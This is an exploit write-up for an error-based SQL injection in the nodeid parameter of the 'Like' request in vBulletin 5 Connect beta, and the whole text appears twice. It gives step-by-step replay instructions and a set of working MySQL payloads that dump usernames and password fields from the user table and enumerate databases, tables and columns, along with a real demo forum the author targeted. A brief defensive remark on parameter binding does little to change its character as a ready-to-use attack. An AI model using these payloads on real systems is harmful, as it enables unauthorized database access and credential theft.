#Title: vBulletin 5 Connect (beta) - error-based SQL injection in the nodeid parameter of the "Like" request
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox with the Live HTTP Headers add-on (or any tool that can capture and replay an authenticated POST request)
#Software Link: Buy vBulletin 5 Connect
vBulletin Forum Features
***********.com
#Version: vBulletin 5 Connect beta builds current as of the date above (the author reports older vBulletin versions are not affected); treat later builds as patched unless re-tested
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux (this is the tester's client machine, not the target; the payloads below are MySQL-specific, so the target's OS is irrelevant)
#Demo site used by the author (the vendor's demo forum at the time; only test against systems you are authorized to test):
http://vb5connect.com/bb/
************************************************** ****************
-------------------------------------------------------------------
-------------------------------------------------------------------
How to
-------------------------------------------------------------------
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#1] Register an account on the target vBulletin 5 forum and log in; the Like request replayed below is captured from that logged-in session.
http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#2] Open any thread and start Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/) so that the requests the browser sends next are captured.
http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#3] Click the Like button on a post; the captured request list should resemble the screenshot below. Select the first POST entry (the Like request whose body carries the nodeid parameter) and click Replay.
http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#4] In the Replay window, set the POST body (Send POST Content) to the following, leaving any other parameters that were captured alongside nodeid unchanged:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27,0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://imageshack.us/a/img42/1590/26447606.png
// Keep the nodeid value exactly as it appeared in the captured POST body (70 is only the author's example); a nodeid that does not exist on the target yields an "invalid nodeid" error instead of the injected result.
The payload above returns one row of the user table as ~'username'~password'~ inside a MySQL duplicate-entry error message. Note that LIMIT 1,1 means offset 1, count 1 - the second row, not the first; LIMIT 0,1 selects the first row. The password column holds whatever vBulletin stores for the account (presumably a hash rather than a cleartext password; confirm on the target). Defensively, this bug class is closed by casting nodeid to an integer server-side or binding it as a query parameter, and by not echoing raw database errors to the client, since the technique depends on that error text being reflected.
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#Other payloads] All of these reuse the same error-based template (count(*) combined with floor(rand(0)*2) and GROUP BY x, which makes MySQL raise a duplicate-key error whose message carries the result of the innermost SELECT); only that innermost SELECT changes. They therefore only work while the application reflects MySQL error text in its response.
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Version():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|User():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database Print:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Table Count:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Print Tables:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Column count of selected table (count(column_name), not the column names):
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Fetch Out Data:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox with the Live HTTP Headers add-on (or any tool that can capture and replay an authenticated POST request)
#Software Link: Buy vBulletin 5 Connect
vBulletin Forum Features
***********.com
#Version: vBulletin 5 Connect beta builds current as of the date above (the author reports older vBulletin versions are not affected); treat later builds as patched unless re-tested
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux (this is the tester's client machine, not the target; the payloads below are MySQL-specific, so the target's OS is irrelevant)
#Demo site used by the author (the vendor's demo forum at the time; only test against systems you are authorized to test):
http://vb5connect.com/bb/
************************************************** ****************
-------------------------------------------------------------------
-------------------------------------------------------------------
How to
-------------------------------------------------------------------
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#1] Register an account on the target vBulletin 5 forum and log in; the Like request replayed below is captured from that logged-in session.
http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#2] Open any thread and start Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/) so that the requests the browser sends next are captured.
http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#3] Click the Like button on a post; the captured request list should resemble the screenshot below. Select the first POST entry (the Like request whose body carries the nodeid parameter) and click Replay.
http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#4] In the Replay window, set the POST body (Send POST Content) to the following, leaving any other parameters that were captured alongside nodeid unchanged:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27,0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://imageshack.us/a/img42/1590/26447606.png
// Keep the nodeid value exactly as it appeared in the captured POST body (70 is only the author's example); a nodeid that does not exist on the target yields an "invalid nodeid" error instead of the injected result.
The payload above returns one row of the user table as ~'username'~password'~ inside a MySQL duplicate-entry error message. Note that LIMIT 1,1 means offset 1, count 1 - the second row, not the first; LIMIT 0,1 selects the first row. The password column holds whatever vBulletin stores for the account (presumably a hash rather than a cleartext password; confirm on the target). Defensively, this bug class is closed by casting nodeid to an integer server-side or binding it as a query parameter, and by not echoing raw database errors to the client, since the technique depends on that error text being reflected.
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#Other payloads] All of these reuse the same error-based template (count(*) combined with floor(rand(0)*2) and GROUP BY x, which makes MySQL raise a duplicate-key error whose message carries the result of the innermost SELECT); only that innermost SELECT changes. They therefore only work while the application reflects MySQL error text in its response.
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Version():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|User():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database Print:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Table Count:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Print Tables:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Column count of selected table (count(column_name), not the column names):
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Fetch Out Data:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------